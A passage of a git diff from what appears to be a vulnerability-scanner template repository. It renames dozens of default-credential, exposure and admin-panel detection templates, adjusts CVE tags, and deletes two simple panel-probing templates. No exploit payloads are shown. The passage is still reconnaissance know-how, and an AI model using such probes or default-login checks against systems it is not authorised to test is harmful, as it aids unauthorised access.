(76%) rename exposures/configs/{amazon-docker-config-disclosure.yaml => amazon-docker-config.yaml} (90%) rename exposures/configs/{kyan-network-credentials-disclosure.yaml => kyan-credential-exposure.yaml} (93%) rename exposures/configs/{oracle-ebs-credentials-disclosure.yaml => oracle-ebs-credentials.yaml} (95%) rename exposures/configs/{ruijie-nbr1300g-cli-password-leak.yaml => ruijie-nbr1300g-exposure.yaml} (95%) rename exposures/files/{ruby-on-rails-secret-token-disclosure.yaml => rails-secret-token-disclosure.yaml} (93%) rename exposures/files/{sensitive-storage-data-exposure.yaml => sensitive-storage-exposure.yaml} (100%) rename iot/{unauthorized-brother-access-detect.yaml => brother-unauthorized-access.yaml} (83%) rename misconfiguration/{http-etcd-unauthenticated-api-data-leak.yaml => etcd-unauthenticated-api.yaml} (100%) rename misconfiguration/{zenphoto-installation-sensitive-info.yaml => zenphoto-sensitive-info.yaml} (100%) rename vulnerabilities/ibm/{ibm-infoprint-directory-traversal.yaml => ibm-infoprint-lfi.yaml} (100%) diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 12b29d2090..3d7dd8e395 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss,wp-plugin + tags: cve,cve2014,wordpress,xss,wp-plugin description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." requests: diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index fddddf2586..fd2ae09625 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce,iot + tags: cve,cve2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index 4ce8628577..fd87d15c32 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 - tags: cves,cve2019,kindeditor,xss + tags: cve,cve2019,kindeditor,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index 11a660996c..62ede841c5 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - tags: cves,cve2020,shoretel,xss + tags: cve,cve2020,shoretel,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index 5217c1c155..aebcb7782d 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - tags: cves,cve2021,maxsite,xss + tags: cve,cve2021,maxsite,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml similarity index 92% rename from default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml rename to default-logins/UCMDB/ucmdb-default-login.yaml index 89d086f3dd..853c72e16b 100644 --- a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -1,4 +1,4 @@ -id: micro-focus-ucmdb-default-credentials +id: ucmdb-default-login info: name: Micro Focus UCMDB Default Credentials diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/aem-default-login.yaml similarity index 97% rename from default-logins/aem/adobe-aem-default-credentials.yaml rename to default-logins/aem/aem-default-login.yaml index bb68f1a710..71d356860b 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/aem-default-login.yaml @@ -1,4 +1,4 @@ -id: adobe-aem-default-credentials +id: aem-default-login info: name: Adobe AEM Default Credentials diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/canal-default-login.yaml similarity index 86% rename from default-logins/alibaba/alibaba-canal-default-password.yaml rename to default-logins/alibaba/canal-default-login.yaml index ce8a5524c7..3ed00c8cc5 100644 --- a/default-logins/alibaba/alibaba-canal-default-password.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -1,7 +1,7 @@ -id: alibaba-canal-default-password +id: canal-default-login info: - name: Alibaba Canal Default Password + name: Alibaba Canal Default Credentials author: pdteam severity: high tags: alibaba,default-login diff --git a/default-logins/ambari/ambari-default-credentials.yaml b/default-logins/ambari/ambari-default-login.yaml similarity index 100% rename from default-logins/ambari/ambari-default-credentials.yaml rename to default-logins/ambari/ambari-default-login.yaml diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-login.yaml similarity index 100% rename from default-logins/apache/airflow-default-credentials.yaml rename to default-logins/apache/airflow-default-login.yaml diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/superset-default-login.yaml similarity index 100% rename from default-logins/apache/apache-superset-default-credentials.yaml rename to default-logins/apache/superset-default-login.yaml diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-default-login.yaml similarity index 91% rename from default-logins/apache/tomcat-manager-default.yaml rename to default-logins/apache/tomcat-default-login.yaml index 7fb21388b8..685ca0ca0e 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -1,6 +1,6 @@ -id: tomcat-manager-default +id: tomcat-default-login info: - name: tomcat-manager-default-password + name: Tomcat Manager Default Credentials author: pdteam severity: high tags: tomcat,apache,default-login diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-login.yaml similarity index 90% rename from default-logins/arl/arl-default-password.yaml rename to default-logins/arl/arl-default-login.yaml index 08f426e7da..c7877e85f7 100644 --- a/default-logins/arl/arl-default-password.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -1,7 +1,7 @@ -id: arl-default-password +id: arl-default-login info: - name: ARL Default Password + name: ARL Default Credentials author: pikpikcu severity: high tags: arl,default-login diff --git a/default-logins/axis2/axis2-default-password.yaml b/default-logins/axis2/axis2-default-login.yaml similarity index 100% rename from default-logins/axis2/axis2-default-password.yaml rename to default-logins/axis2/axis2-default-login.yaml diff --git a/default-logins/azkaban/azkaban-web-client-default-creds.yaml b/default-logins/azkaban/azkaban-default-login.yaml similarity index 91% rename from default-logins/azkaban/azkaban-web-client-default-creds.yaml rename to default-logins/azkaban/azkaban-default-login.yaml index 9d2c161334..ae21b174e8 100644 --- a/default-logins/azkaban/azkaban-web-client-default-creds.yaml +++ b/default-logins/azkaban/azkaban-default-login.yaml @@ -1,4 +1,4 @@ -id: azkaban-web-client-default-creds +id: azkaban-default-login info: name: Azkaban Web Client Default Credential diff --git a/default-logins/chinaunicom/chinaunicom-modem-default-credentials.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml similarity index 91% rename from default-logins/chinaunicom/chinaunicom-modem-default-credentials.yaml rename to default-logins/chinaunicom/chinaunicom-default-login.yaml index ed58f2f847..f6e43806a9 100644 --- a/default-logins/chinaunicom/chinaunicom-modem-default-credentials.yaml +++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -1,4 +1,4 @@ -id: chinaunicom-modem-default-credentials +id: chinaunicom-default-login info: name: Chinaunicom Modem Default Credentials diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/emcecom-default-login.yaml similarity index 100% rename from default-logins/dell/dell-emc-ecom-default-credentials.yaml rename to default-logins/dell/emcecom-default-login.yaml diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-login.yaml similarity index 82% rename from default-logins/druid/druid-default-password.yaml rename to default-logins/druid/druid-default-login.yaml index b4a1e28124..ce51b74bdd 100644 --- a/default-logins/druid/druid-default-password.yaml +++ b/default-logins/druid/druid-default-login.yaml @@ -1,7 +1,7 @@ -id: druid-default-password +id: druid-default-login info: - name: Druid Default Password + name: Druid Default Credentials author: pikpikcu severity: high tags: druid,default-login diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml index 4cf084572e..996f7d3414 100644 --- a/default-logins/dvwa/dvwa-default-login.yaml +++ b/default-logins/dvwa/dvwa-default-login.yaml @@ -1,6 +1,6 @@ id: dvwa-default-login info: - name: DVWA Default Login + name: DVWA Default Credentials author: pdteam severity: critical tags: dvwa,default-login diff --git a/default-logins/exacqvision/exacqvision-default-credentials.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml similarity index 91% rename from default-logins/exacqvision/exacqvision-default-credentials.yaml rename to default-logins/exacqvision/exacqvision-default-login.yaml index 50e5cf8e5d..e1b88734e1 100644 --- a/default-logins/exacqvision/exacqvision-default-credentials.yaml +++ b/default-logins/exacqvision/exacqvision-default-login.yaml @@ -1,7 +1,7 @@ -id: exacqvision-default-credentials +id: exacqvision-default-login info: - name: ExacqVision Default Password + name: ExacqVision Default Credentials author: ELSFA7110 severity: high tags: exacqvision,default-login diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-default-login.yaml similarity index 96% rename from default-logins/flir/flir-ax8-default-credentials.yaml rename to default-logins/flir/flir-default-login.yaml index 3f011e9350..244b3f7770 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-default-login.yaml @@ -1,4 +1,4 @@ -id: flir-default-credentials +id: flir-default-login info: name: Flir Default Credentials diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-login.yaml similarity index 100% rename from default-logins/frps/frp-default-credentials.yaml rename to default-logins/frps/frp-default-login.yaml diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-login.yaml similarity index 95% rename from default-logins/glpi/glpi-default-credential.yaml rename to default-logins/glpi/glpi-default-login.yaml index 4af21aa850..a6682402cd 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-login.yaml @@ -1,6 +1,6 @@ -id: glpi-default-credentials +id: glpi-default-login info: - name: GLPI Default Credentials Check + name: GLPI Default Credentials author: andysvints severity: high tags: glpi,default-login diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-login.yaml similarity index 94% rename from default-logins/grafana/grafana-default-credential.yaml rename to default-logins/grafana/grafana-default-login.yaml index 8af859b590..fe8fde6b88 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -1,6 +1,6 @@ -id: grafana-default-credential +id: grafana-default-login info: - name: Grafana Default Credentials Check + name: Grafana Default Credentials author: pdteam severity: high tags: grafana,default-login diff --git a/default-logins/hongdian/hongdian-default-password.yaml b/default-logins/hongdian/hongdian-default-login.yaml similarity index 100% rename from default-logins/hongdian/hongdian-default-password.yaml rename to default-logins/hongdian/hongdian-default-login.yaml diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/smartsense-default-login.yaml similarity index 92% rename from default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml rename to default-logins/hortonworks/smartsense-default-login.yaml index 132cee76fd..f65959bb3b 100644 --- a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml +++ b/default-logins/hortonworks/smartsense-default-login.yaml @@ -1,4 +1,4 @@ -id: hortonworks-smartsense-default-credentials +id: smartsense-default-login info: name: HortonWorks SmartSense Default Credentials diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 25d1a2fc6b..5355da56b9 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -1,7 +1,7 @@ -id: ibm-storage-default-credential +id: ibm-storage-default-login info: - name: IBM Storage Management default creds + name: IBM Storage Management Default Credentials author: madrobot severity: medium tags: default-login,ibm diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml similarity index 92% rename from default-logins/idemia/idemia-biometrics-default-credentials.yaml rename to default-logins/idemia/idemia-biometrics-default-login.yaml index da3d4290e4..9387666a77 100644 --- a/default-logins/idemia/idemia-biometrics-default-credentials.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -1,4 +1,4 @@ -id: idemia-biometrics-default-credentials +id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Credentials diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index da94fcec13..2783440e0b 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -1,7 +1,7 @@ id: iptime-default-login info: - name: ipTIME Default Login + name: ipTIME Default Credentials author: gy741 severity: high tags: iptime,default-login diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-login.yaml similarity index 93% rename from default-logins/minio/minio-default-password.yaml rename to default-logins/minio/minio-default-login.yaml index 12c46a6efe..a715abd0f3 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-login.yaml @@ -1,7 +1,7 @@ -id: minio-default-password +id: minio-default-login info: - name: Minio Default Password + name: Minio Default Credentials author: pikpikcu severity: medium tags: default-login,minio diff --git a/default-logins/nagios/nagios-default-credential.yaml b/default-logins/nagios/nagios-default-login.yaml similarity index 86% rename from default-logins/nagios/nagios-default-credential.yaml rename to default-logins/nagios/nagios-default-login.yaml index e582f205aa..fcb2f57abe 100644 --- a/default-logins/nagios/nagios-default-credential.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -1,6 +1,6 @@ -id: nagios-default-credentials +id: nagios-default-login info: - name: Nagios Default Credentials Check + name: Nagios Default Credentials author: iamthefrogy severity: high tags: nagios,default-login diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-login.yaml similarity index 90% rename from default-logins/nexus/nexus-default-password.yaml rename to default-logins/nexus/nexus-default-login.yaml index b44818775d..048122d052 100644 --- a/default-logins/nexus/nexus-default-password.yaml +++ b/default-logins/nexus/nexus-default-login.yaml @@ -1,7 +1,7 @@ -id: nexus-default-password +id: nexus-default-login info: - name: Nexus Default Password + name: Nexus Default Credentials author: pikpikcu severity: high tags: nexus,default-login diff --git a/default-logins/nps/nps-default-password.yaml b/default-logins/nps/nps-default-login.yaml similarity index 92% rename from default-logins/nps/nps-default-password.yaml rename to default-logins/nps/nps-default-login.yaml index d3ade09bfa..cbad4c677a 100644 --- a/default-logins/nps/nps-default-password.yaml +++ b/default-logins/nps/nps-default-login.yaml @@ -1,7 +1,7 @@ -id: nps-default-password +id: nps-default-login info: - name: NPS Default Password + name: NPS Default Credentials author: pikpikcu severity: high tags: nps,default-login diff --git a/default-logins/ofbiz/ofbiz-default-credentials.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml similarity index 100% rename from default-logins/ofbiz/ofbiz-default-credentials.yaml rename to default-logins/ofbiz/ofbiz-default-login.yaml diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/businessintelligence-default-login.yaml similarity index 95% rename from default-logins/oracle/oracle-bi-default-credentials.yaml rename to default-logins/oracle/businessintelligence-default-login.yaml index 528c4f0c65..13706a3c30 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/businessintelligence-default-login.yaml @@ -1,4 +1,4 @@ -id: oracle-business-intelligence-default-credentials +id: oracle-business-intelligence-login info: name: Oracle Business Intelligence Default Credentials diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-login.yaml similarity index 95% rename from default-logins/paloalto/panos-default-credentials.yaml rename to default-logins/paloalto/panos-default-login.yaml index 15bc58afa5..2a9e289e52 100644 --- a/default-logins/paloalto/panos-default-credentials.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -1,4 +1,4 @@ -id: panos-default-credentials +id: panos-default-login info: name: Palo Alto Networks PAN-OS Default Credentials diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-login.yaml similarity index 93% rename from default-logins/panabit/panabit-default-password.yaml rename to default-logins/panabit/panabit-default-login.yaml index 5974205e14..3f390a5b8d 100644 --- a/default-logins/panabit/panabit-default-password.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -1,7 +1,7 @@ -id: panabit-gateway-defalut-password +id: panabit-default-login info: - name: Panabit Default Password + name: Panabit Gateway Default Credentials author: pikpikcu severity: high reference: https://max.book118.com/html/2017/0623/117514590.shtm diff --git a/default-logins/rabbitmq/rabbitmq-default-admin.yaml b/default-logins/rabbitmq/rabbitmq-default-login.yaml similarity index 87% rename from default-logins/rabbitmq/rabbitmq-default-admin.yaml rename to default-logins/rabbitmq/rabbitmq-default-login.yaml index 034e6d241c..237a3d11e0 100644 --- a/default-logins/rabbitmq/rabbitmq-default-admin.yaml +++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -1,7 +1,7 @@ -id: rabbitmq-default-admin +id: rabbitmq-default-login info: - name: RabbitMQ Default Credentials + name: RabbitMQ admin Default Credentials author: fyoorer,dwisiswant0 severity: high tags: rabbitmq,default-login diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-login.yaml similarity index 95% rename from default-logins/rockmongo/rockmongo-default-credentials.yaml rename to default-logins/rockmongo/rockmongo-default-login.yaml index 179b53aca2..5ef3fc4895 100644 --- a/default-logins/rockmongo/rockmongo-default-credentials.yaml +++ b/default-logins/rockmongo/rockmongo-default-login.yaml @@ -1,4 +1,4 @@ -id: rockmongo-default-credentials +id: rockmongo-default-login info: name: Rockmongo Default Credentials diff --git a/default-logins/samsung/samsung-wlan-ap-default-credentials.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml similarity index 93% rename from default-logins/samsung/samsung-wlan-ap-default-credentials.yaml rename to default-logins/samsung/samsung-wlan-default-login.yaml index 8355e8d87c..5d39b7aced 100644 --- a/default-logins/samsung/samsung-wlan-ap-default-credentials.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -1,4 +1,4 @@ -id: samsung-wlan-ap-default-credentials +id: samsung-wlan-default-login info: name: Samsung Wlan AP (WEA453e) Default Credentials diff --git a/default-logins/showdoc/showdoc-default-password.yaml b/default-logins/showdoc/showdoc-default-login.yaml similarity index 90% rename from default-logins/showdoc/showdoc-default-password.yaml rename to default-logins/showdoc/showdoc-default-login.yaml index fcccdeac10..1ef661333a 100644 --- a/default-logins/showdoc/showdoc-default-password.yaml +++ b/default-logins/showdoc/showdoc-default-login.yaml @@ -1,7 +1,7 @@ -id: showdoc-default-password +id: showdoc-default-login info: - name: Showdoc Default Password + name: Showdoc Default Credentials author: pikpikcu severity: medium reference: diff --git a/default-logins/solarwinds/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-login.yaml similarity index 100% rename from default-logins/solarwinds/solarwinds-default-admin.yaml rename to default-logins/solarwinds/solarwinds-default-login.yaml diff --git a/default-logins/spectracom/spectracom-default-credential.yaml b/default-logins/spectracom/spectracom-default-login.yaml similarity index 89% rename from default-logins/spectracom/spectracom-default-credential.yaml rename to default-logins/spectracom/spectracom-default-login.yaml index e552e1251c..d60d573373 100644 --- a/default-logins/spectracom/spectracom-default-credential.yaml +++ b/default-logins/spectracom/spectracom-default-login.yaml @@ -1,7 +1,7 @@ -id: spectracom-default-credential +id: spectracom-default-login info: - name: Spectracom Default creds + name: Spectracom Default Credentials author: madrobot severity: medium tags: spectracom,default-login diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-login.yaml similarity index 92% rename from default-logins/szhe/szhe-default-password.yaml rename to default-logins/szhe/szhe-default-login.yaml index a9bad340b2..1eee03a541 100644 --- a/default-logins/szhe/szhe-default-password.yaml +++ b/default-logins/szhe/szhe-default-login.yaml @@ -1,7 +1,7 @@ -id: szhe-default-password +id: szhe-default-login info: - name: Szhe Default Password + name: Szhe Default Credentials author: pikpikcu severity: low tags: szhe,default-login diff --git a/default-logins/vidyo/vidyo-default-credentials.yaml b/default-logins/vidyo/vidyo-default-login.yaml similarity index 100% rename from default-logins/vidyo/vidyo-default-credentials.yaml rename to default-logins/vidyo/vidyo-default-login.yaml diff --git a/default-logins/viewpoint/trilithic-viewpoint-default.yaml b/default-logins/viewpoint/trilithic-viewpoint-login.yaml similarity index 100% rename from default-logins/viewpoint/trilithic-viewpoint-default.yaml rename to default-logins/viewpoint/trilithic-viewpoint-login.yaml diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-login.yaml similarity index 100% rename from default-logins/visionhub/visionhub-default-credentials.yaml rename to default-logins/visionhub/visionhub-default-login.yaml diff --git a/default-logins/wifisky/wifisky-default-password.yaml b/default-logins/wifisky/wifisky-default-login.yaml similarity index 89% rename from default-logins/wifisky/wifisky-default-password.yaml rename to default-logins/wifisky/wifisky-default-login.yaml index ece1a116da..0f4f5453d3 100644 --- a/default-logins/wifisky/wifisky-default-password.yaml +++ b/default-logins/wifisky/wifisky-default-login.yaml @@ -1,7 +1,7 @@ -id: wifisky-default-password +id: wifisky-default-login info: - name: Wifisky Default Password + name: Wifisky Default Credentials author: pikpikcu severity: high tags: default-login,wifisky diff --git a/default-logins/wso2/wso2-default-password.yaml b/default-logins/wso2/wso2-default-login.yaml similarity index 85% rename from default-logins/wso2/wso2-default-password.yaml rename to default-logins/wso2/wso2-default-login.yaml index 70b283e8c0..95d84ac92d 100644 --- a/default-logins/wso2/wso2-default-password.yaml +++ b/default-logins/wso2/wso2-default-login.yaml @@ -1,7 +1,7 @@ -id: wso2-management-console-default-password +id: wso2-default-login info: - name: WSO2 Management Console Default Password + name: WSO2 Management Console Default Credentials author: cocxanh severity: high reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index bab7c5bb49..9e2d865b65 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -1,7 +1,7 @@ id: xxljob-default-login info: - name: XXL-JOB default login + name: XXL-JOB Default Credentials author: pdteam severity: high tags: default-login,xxljob diff --git a/default-logins/zabbix/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-login.yaml similarity index 100% rename from default-logins/zabbix/zabbix-default-credentials.yaml rename to default-logins/zabbix/zabbix-default-login.yaml diff --git a/default-logins/zmanda/zmanda-default-credential.yaml b/default-logins/zmanda/zmanda-default-login.yaml similarity index 95% rename from default-logins/zmanda/zmanda-default-credential.yaml rename to default-logins/zmanda/zmanda-default-login.yaml index f8a52ed7c7..5387e171f8 100644 --- a/default-logins/zmanda/zmanda-default-credential.yaml +++ b/default-logins/zmanda/zmanda-default-login.yaml @@ -1,4 +1,4 @@ -id: zmanda-default-credential +id: zmanda-default-login info: name: Zmanda Default Credentials diff --git a/exposed-panels/adobe-component-login.yaml b/exposed-panels/adobe/adobe-component-login.yaml similarity index 100% rename from exposed-panels/adobe-component-login.yaml rename to exposed-panels/adobe/adobe-component-login.yaml diff --git a/exposed-panels/adobe-connect-central-login.yaml b/exposed-panels/adobe/adobe-connect-central-login.yaml similarity index 100% rename from exposed-panels/adobe-connect-central-login.yaml rename to exposed-panels/adobe/adobe-connect-central-login.yaml diff --git a/exposed-panels/adobe-experience-manager-login.yaml b/exposed-panels/adobe/adobe-experience-manager-login.yaml similarity index 100% rename from exposed-panels/adobe-experience-manager-login.yaml rename to exposed-panels/adobe/adobe-experience-manager-login.yaml diff --git a/exposed-panels/adobe-media-server.yaml b/exposed-panels/adobe/adobe-media-server.yaml similarity index 100% rename from exposed-panels/adobe-media-server.yaml rename to exposed-panels/adobe/adobe-media-server.yaml diff --git a/exposed-panels/dell-wyse-management-suite-login.yaml b/exposed-panels/dell-wyse-login.yaml similarity index 93% rename from exposed-panels/dell-wyse-management-suite-login.yaml rename to exposed-panels/dell-wyse-login.yaml index 09824b09b1..0e6c9f0f21 100644 --- a/exposed-panels/dell-wyse-management-suite-login.yaml +++ b/exposed-panels/dell-wyse-login.yaml @@ -1,4 +1,4 @@ -id: dell-wyse-management-suite-login +id: dell-wyse-login info: name: Dell Wyse Management Suite Login Panel diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/entrust-identityguard.yaml similarity index 100% rename from exposed-panels/identityguard-selfservice-entrust.yaml rename to exposed-panels/entrust-identityguard.yaml diff --git a/exposed-panels/epson-unauthorized-access-detect.yaml b/exposed-panels/epson-access-detect.yaml similarity index 84% rename from exposed-panels/epson-unauthorized-access-detect.yaml rename to exposed-panels/epson-access-detect.yaml index a1d5e61482..c81cc0d6cc 100644 --- a/exposed-panels/epson-unauthorized-access-detect.yaml +++ b/exposed-panels/epson-access-detect.yaml @@ -1,7 +1,7 @@ -id: epson-unauthorized-access-detect +id: epson-access-detect info: - name: Epson Printer + name: Epson Printer Unauthorized Access Detect author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6922 diff --git a/exposed-panels/exposed-pagespeed-global-admin.yaml b/exposed-panels/exposed-pagespeed-global-admin.yaml deleted file mode 100644 index 0ad8e055a4..0000000000 --- a/exposed-panels/exposed-pagespeed-global-admin.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: exposed-pagespeed-global-admin - -info: - name: Apache PageSpeed Global Admin Dashboard Exposure - author: pdteam - severity: medium - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/pagespeed_admin/' - matchers: - - type: word - words: - - "Pagespeed Admin" \ No newline at end of file diff --git a/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml b/exposed-panels/iomega-emc-shared-nas.yaml similarity index 93% rename from exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml rename to exposed-panels/iomega-emc-shared-nas.yaml index 3a5b72b76f..f9d328f3d4 100644 --- a/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml +++ b/exposed-panels/iomega-emc-shared-nas.yaml @@ -1,4 +1,4 @@ -id: iomega-lenovo-emc-shared-nas +id: iomega-emc-shared-nas info: name: Iomega Lenovo EMC with shared NAS diff --git a/exposed-panels/manage-engine-admanager-panel.yaml b/exposed-panels/manage-engine-admanager-panel.yaml deleted file mode 100644 index 62ca19c347..0000000000 --- a/exposed-panels/manage-engine-admanager-panel.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: manage-engine-admanager-panel - -info: - name: Manage Engine ADManager Panel - author: PR3R00T - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/authorization.do" - matchers: - - type: word - words: - - "ManageEngine - ADManager Plus" diff --git a/exposed-panels/microsoft-exchange-control-panel.yaml b/exposed-panels/microsoft-exchange-panel.yaml similarity index 88% rename from exposed-panels/microsoft-exchange-control-panel.yaml rename to exposed-panels/microsoft-exchange-panel.yaml index 5aa1d49d68..9db620dfa3 100644 --- a/exposed-panels/microsoft-exchange-control-panel.yaml +++ b/exposed-panels/microsoft-exchange-panel.yaml @@ -1,4 +1,4 @@ -id: microsoft-exchange-control-panel +id: microsoft-exchange-panel info: name: Microsoft Exchange Control Panel diff --git a/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml b/exposed-panels/pacs-connexion-utilisateur.yaml similarity index 100% rename from exposed-panels/gxd5-pacs-connexion-utilisateur.yaml rename to exposed-panels/pacs-connexion-utilisateur.yaml diff --git a/exposed-panels/landfill-remote-monitoring-control.yaml b/exposed-panels/scs-landfill-control.yaml similarity index 94% rename from exposed-panels/landfill-remote-monitoring-control.yaml rename to exposed-panels/scs-landfill-control.yaml index e6be9c7160..4500e3e023 100644 --- a/exposed-panels/landfill-remote-monitoring-control.yaml +++ b/exposed-panels/scs-landfill-control.yaml @@ -1,4 +1,4 @@ -id: landfill-remote-monitoring-control +id: scs-landfill-control info: name: SCS Landfill Remote Monitoring Control diff --git a/exposed-panels/tomcat-manager-pathnormalization.yaml 